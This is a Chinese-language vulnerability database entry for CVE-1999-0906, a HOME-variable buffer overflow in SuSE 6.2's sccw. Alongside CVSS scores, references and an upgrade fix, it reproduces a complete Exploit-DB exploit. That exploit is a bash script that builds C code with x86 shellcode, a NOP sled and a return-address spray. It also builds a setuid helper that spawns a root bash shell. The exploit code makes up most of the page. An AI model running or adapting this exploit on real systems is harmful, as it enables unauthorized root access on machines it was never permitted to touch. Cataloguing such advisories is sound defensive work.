CVE-1999-0906
CVSS7.2
发布时间 :1999-09-23 00:00:00
修订时间 :2008-09-09 08:36:09
NMCOE    

[原文]Buffer overflow in sccw allows local users to gain root access via the HOME environmental variable.


[CNNVD]SuSE sscw HOME环境变量缓冲区溢出漏洞(CNNVD-199909-044)

        sccw中存在缓冲区溢出漏洞。本地用户利用该漏洞通过HOME环境变量获得根访问。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0906
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0906
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-044
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/656
(UNKNOWN)  BID  656

- 漏洞信息

SuSE sscw HOME环境变量缓冲区溢出漏洞
高危 缓冲区溢出
1999-09-23 00:00:00 2005-05-02 00:00:00
本地  
        sccw中存在缓冲区溢出漏洞。本地用户利用该漏洞通过HOME环境变量获得根访问。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (19508)

S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability (EDBID:19508)
linux local
1999-09-23 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/656/info

A buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. 

#!/bin/bash
#
# Linux x86 exploit for /usr/bin/sccw on SuSE 6.2
#
# -Brock Tellier btellier@webley.com

echo "Building /tmp/sccwx.c..."
cat > /tmp/sccwx.c << FOEFOE
/*
 * sccw local root Linux x86 tested on SuSE 6.2
 * gcc -o sccwx sccwx.c
 * must compile/run a setuid(geteuid()); system("/bin/bash"); for a
rootshell
 *
 * -Brock Tellier btellier@webley.com
 */


#include <stdlib.h>
#include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/sc";



#define LEN 400
#define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


void main(int argc, char *argv[]) {

int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];

 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
 }
 else if (argc == 2){
   offset=atoi(argv[1]);

 }
 else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);

 }
 else {
   offset=2100;
   buflen=300;

 }


addr=get_sp();

fprintf(stderr, "SuSE 6.2 sccw local root\n");
fprintf(stderr, "Brock Tellier btellier@webley.com\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;

setenv("HOME", buf, 1);
execl("/usr/bin/sccw", "sccw", NULL);

}
FOEFOE

echo "Building /tmp/sccwuid.c..."

cat > /tmp/sccwuid.c <<EOFFOE
void main()
{
    setuid(geteuid());
    system("/bin/bash");
}
EOFFOE

echo "Compiling /tmp/sccwx..."
gcc -o /tmp/sccwx /tmp/sccwx.c

echo "Compiling /tmp/sc..."
gcc -o /tmp/sc /tmp/sccwuid.c

echo "Launching /tmp/sccwx..."
/tmp/sccwx
echo "If it didn't work, try /tmp/sccwx <offset> <bufsiz>"		

- 漏洞信息

1081
sscw HOME Environment Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

1999-09-23 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.1-39 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站